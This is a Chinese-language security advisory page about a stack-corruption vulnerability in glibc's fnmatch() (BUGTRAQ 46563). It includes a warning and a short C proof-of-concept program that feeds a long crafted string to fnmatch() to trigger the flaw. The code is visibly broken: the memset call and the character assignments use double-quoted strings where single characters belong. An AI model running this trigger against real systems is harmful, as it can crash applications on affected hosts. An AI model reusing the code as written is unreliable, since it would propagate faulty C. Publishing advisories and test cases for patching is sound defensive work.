GNU glibc "fnmatch()"函数栈破坏漏洞发布日期:2011-02-25
更新日期:2011-02-25受影响系统:
GNU glibc 2.x
不受影响系统:
GNU glibc 2.12.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 46563glibc是绝大多数Linux操作系统中C库的实现。glibc在实现上存在漏洞,攻击者可利用此漏洞在使用受影响库的系统中执行任意代码,使应用程序崩溃。漏洞源于"fnmatch()" 函数的实现中存在错误,可通过特制的输入造成栈破坏。<*来源:Simon Berry-Byrne
链接:http://www.sourceware.org/bugzilla/show_bug.cgi?id=11883
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Simon Berry-Byrne ()提供了如下测试方法:#include <err.h>
#include <fnmatch.h>
#include <locale.h>
#include <stdlib.h>
#include <string.h>int main(int argc, const char* argv[]) {
size_t num_as;
char* p;
setlocale(LC_ALL, "en_US.UTF8");
if (argc < 2) {
errx(1, "Missing argument.");
}
num_as = atoi(argv[1]);
if (num_as < 5) {
errx(1, "Need 5.");
}
p = malloc(num_as);
if (!p) {
errx(1, "malloc() failed.");
}
memset(p, "A", num_as);
p[num_as - 1] = " ";
p[0] = "f";
p[1] = "o";
p[2] = "o";
p[3] = ".";
fnmatch("*.anim[1-9j]", p, 0);
return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.gnu.orgCisco Secure Desktop ActiveX控件可执行文件任意文件下载漏洞Samba “FD_SET”内存破坏漏洞相关资讯 Linux漏洞
- 敲击28次退格键之后:Linux漏洞可 (12/18/2015 11:22:28)
- Linux出现重大漏洞 GHOST ? (01/30/2015 18:35:07)
- Linux 2.6.31本地代码执行漏洞( (07/07/2014 07:51:17)
| - Red Hat Linux 修补“libuser”库 (07/26/2015 06:39:34)
- 红帽反驳:“Grinch(鬼精灵)”算 (12/30/2014 07:38:23)
- Linux gcc++漏洞:普通用户获得 (08/16/2013 11:57:41)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|